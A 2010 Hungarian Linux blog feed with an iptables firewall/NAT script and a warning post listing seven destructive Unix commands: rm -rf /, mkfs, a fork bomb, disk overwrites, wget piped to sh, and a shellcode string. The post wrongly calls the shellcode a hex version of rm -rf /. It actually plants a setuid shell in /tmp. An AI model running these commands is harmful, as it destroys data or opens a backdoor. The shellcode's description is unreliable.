Pingvinsimogató.hu

Tűzfalszkript 1.

Német Krisztián — Mon, 16 Aug 2010 11:26:08 +0000

#!/bin/bash

echo 1 > /proc/sys/net/ipv4/ip_forward

## Az eddigi szabályok törlése
iptables -F INPUT
iptables -F OUTPUT
iptables -F FORWARD

## Az alap szabályok felállítása
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT

## LOGDROP szabály
iptables -F LOGDROP 2>/dev/null
iptables -X LOGDROP 2>/dev/null
iptables -N LOGDROP
iptables -A LOGDROP -j LOG
iptables -A LOGDROP -j DROP

## Maszkolás
iptables -t nat -F PREROUTING
iptables -t nat -F POSTROUTING
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 64.81.39.24

## Tűzfal szabályok felállítása

iptables -A INPUT -i eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT

#* FTP, SSH, Telnet Portok megnyitása
iptables -A INPUT --proto tcp -i eth0 --destination-port 20:23 -j ACCEPT

#* Mail Portok megnyitása
iptables -A INPUT --proto tcp -i eth0 --destination-port 25 -j ACCEPT
iptables -A INPUT --proto tcp -i eth0 --destination-port 110 -j ACCEPT

#* HTTP & HTTPS Portok megnyitása
iptables -A INPUT --proto tcp -i eth0 --destination-port 80 -j ACCEPT
iptables -A INPUT --proto tcp -i eth0 --destination-port 443 -j ACCEPT

#* IDENTD Port megnyitása
iptables -A INPUT --proto tcp -i eth0 --destination-port 113 -j ACCEPT

#* User Portok megnyitása
iptables -A INPUT --proto tcp -i eth0 --destination-port 1024:65535 -j ACCEPT
iptables -A INPUT --proto udp -i eth0 --destination-port 1024:65535 -j ACCEPT

#* DNS
iptables -A INPUT --proto tcp -i eth0 --destination-port 53 -j ACCEPT
iptables -A INPUT --proto udp -i eth0 --destination-port 53 -j ACCEPT
iptables -A INPUT --proto tcp -i eth0 --destination-port 137:138 -j ACCEPT
iptables -A INPUT --proto udp -i eth0 --destination-port 137:138 -j ACCEPT

#* Talk Port
iptables -A INPUT --proto udp -i eth0 --destination-port 517:518 -j ACCEPT

#* ICMP Replies
iptables -A INPUT -i eth0 --proto icmp --jump ACCEPT

iptables -A OUTPUT --proto tcp --destination-port 2611 -j LOGDROP

#* Az összes többi port tiltása
iptables -A INPUT -i eth0 -j LOGDROP

## Port Forwarding For NAT

#* ICQ portjainak engedélyezése
iptables -A PREROUTING -t nat -p udp -d 64.81.39.24 --dport 4000 -j DNAT --to 192.168.1.2
iptables -A PREROUTING -t nat -p tcp -d 64.81.39.24 --dport 20020:20039 -j DNAT --to 192.168.1.2

#* WebCam Software portjainak engedélyezése
iptables -A PREROUTING -t nat -p tcp -d 64.81.39.24 --dport 2047:2048 -j DNAT --to 192.168.1.1
iptables -A PREROUTING -t nat -p udp -d 64.81.39.24 --dport 2047:2048 -j DNAT --to 192.168.1.1
iptables -A PREROUTING -t nat -p udp -d 64.81.39.24 --dport 1972 -j DNAT --to 192.168.1.1

# Unreal Tournament portjainak engedélyezése
iptables -A PREROUTING -t nat -p tcp -d 64.81.39.24 --dport 7600:7900 -j DNAT --to 192.168.1.1
iptables -A PREROUTING -t nat -p udp -d 64.81.39.24 --dport 7600:7900 -j DNAT --to 192.168.1.1

iptables -A PREROUTING -t nat -p udp -d 64.81.39.24 --dport 3782 -j DNAT --to 192.168.1.2

7 Unix parancs, amit soha ne adj ki!

Német Krisztián — Mon, 16 Aug 2010 11:10:53 +0000

Egy linuxos fórumot olvasva jött elő ennek a bejegyzésnek az ötlete. Ezen a fórumon volt egy vicces bejegyzés:

Hogyan keressünk Linux alatt RealMedia file-okat?

rm = Real Media
-f = full (az összeset)
/ = az egész lemezen

Kezdő felhasználóknak ez nagyon veszélyes, ugyanis a mást jelent ez a parancssor.

1. Parancs, amit soha nem adok ki

rm -rf /

Ez a parancs rekurzíven (alkönyvtárakban is) és kényszerítetten (kérdezés nélkül mindent) töröl mindent a gyökér könyvtáron belül. (vagyis az egész rendszert)

2. Parancs, amit soha nem adok ki

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

A hexadecimális verziója a rm -rf / parancsnak ez éppen eléggé meg tudja téveszteni a tapasztalatlan Linuxost...

3. Parancs, amit soha nem adok ki

mkfs.ext3 /dev/sda

Újraformázza vagyis kitörli az összes fájlodat az adott eszközről (merevlemezről) (Készít egy ext3 partíciót az /dev/sda eszközön.)

4. Parancs, amit soha nem adok ki

){:|:&};:

Ez egy ismert forkbomb, ez azt mondja a rendszerednek hogy futtasson nagy számú processzt addig amíg le nem fagy a gép. Ez gyakran vezet adatvesztéshez.

5. Parancs, amit soha nem adok ki

bármilyen parancs > /dev/sda

Ezzel a paranccsal nyers adatokat írsz egy blokkeszközre ami általában kiüti a fájlrendszert teljes adatvesztést eredményezve.

6. Parancs, amit soha nem adok ki

wget http://bármilyen_link/alexandra_diamond.jpg -O- | sh

Soha ne tölts le nem megbízható forrásból (wget), és utána ne futtasd automatkusan ( | sh), mert lehet hogy rosszindulatú kódot tartalmaz.

7. Parancs, amit soha nem adok ki

mv /home/home_könyvtárad/* /dev/null

Ez áthelyez minden fájlt a home könyvtáradból egy 'fekete lyukba', egy olyan helyre aminek nincs elérése, nincs kijárata csak bejárata van. Ami egyszer ide bekerül, azt soha nem látod viszont.

Szerver virtualizációs technológiák III.

Német Krisztián — Thu, 29 Jul 2010 13:50:20 +0000

Központi menedzselhető tűzfal megvalósítása LDAP segítségével

Német Krisztián — Thu, 29 Jul 2010 13:11:40 +0000

Naplózó infrastruktúra Syslog-ng-vel

Német Krisztián — Thu, 29 Jul 2010 13:06:15 +0000

Különböző hálózatok összekapcsolása, Samba III.

Német Krisztián — Thu, 29 Jul 2010 13:03:39 +0000

Különböző hálózatok összekapcsolása, Samba II.

Német Krisztián — Thu, 29 Jul 2010 13:01:48 +0000

Szerver virtualizációs technológiák I.

Német Krisztián — Thu, 29 Jul 2010 12:57:46 +0000

Különböző hálózatok összekapcsolása, Samba I.

Német Krisztián — Thu, 29 Jul 2010 12:53:43 +0000

Szerver virtualizációs technológiák II.

Német Krisztián — Thu, 29 Jul 2010 12:44:03 +0000